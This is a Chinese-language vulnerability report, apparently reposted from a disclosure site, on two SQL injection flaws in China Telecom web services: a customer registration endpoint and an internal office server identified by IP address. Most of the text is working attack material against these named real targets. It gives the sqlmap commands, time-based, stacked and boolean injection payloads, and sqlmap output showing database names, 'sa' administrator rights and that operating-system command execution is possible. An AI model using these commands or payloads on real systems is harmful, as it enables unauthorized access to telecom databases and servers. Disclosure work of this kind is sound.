中国电信两处SQL注入漏洞中国电信两处SQL注射(SA权限)
【注射点1 - 号码百事通账户平台】
(这个注射点使用sqlmap似乎只能--dbs读出库名,--tables读不出表名。可惜我不会手工注射 ._. )
http://sso.118114.cn/SSO/registerV2.action 注册"号码百事通"帐号这里的检查用户名是否可用的HTTP请求如下(前几天用了新地址但是原先存在SQL注射的这个页面并没有被删除)
http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1
其中的SPID参数存在SQL注射。
【注射点2 - 中国电信内部办公网】
在电信官网可以看到 http://www.chntel.com 为内部办公平台
该站点找回密码页面均在 218.30.7.23 这个服务器上。
该服务器上的这个地址存在SQL注射:
http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111
【注射点1】
sqlmap.py -u "http://customer.besttone.com.cn/UserPortal/PutAuthenCodeForRegisterAllInOne.aspx?PhoneNum=13000000000&SPID=35433333&count=2&typeId=1" --dbs --no-cast
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: SPID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: PhoneNum=13000000000&SPID=35433333'; WAITFOR DELAY '0:0:5'--&count=2&typeId=1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: PhoneNum=13000000000&SPID=35433333' WAITFOR DELAY '0:0:5'--&count=2&typeId=1
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] besttone
[*] cip2
[*] master
[*] model
[*] msdb
[*] tempdb
【注射点2】
sqlmap.py -u "http://218.30.7.23/supervise/loginrt.jsp?CertSerial=111" --dbs --privileges --current-user
该注射点使用sqlmap的--os-cmd或--os-shell均可执行命令。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CertSerial
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: CertSerial=-5327' OR (6481=6481) AND 'KoFV'='KoFV
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: CertSerial=111'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: CertSerial=111' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user: 'sa'
database management system users privileges:
[*] BUILTIN\Administrators
[*] sa (administrator)
available databases [8]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] product
[*] pubs
[*] Supervise
[*] tempdb
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;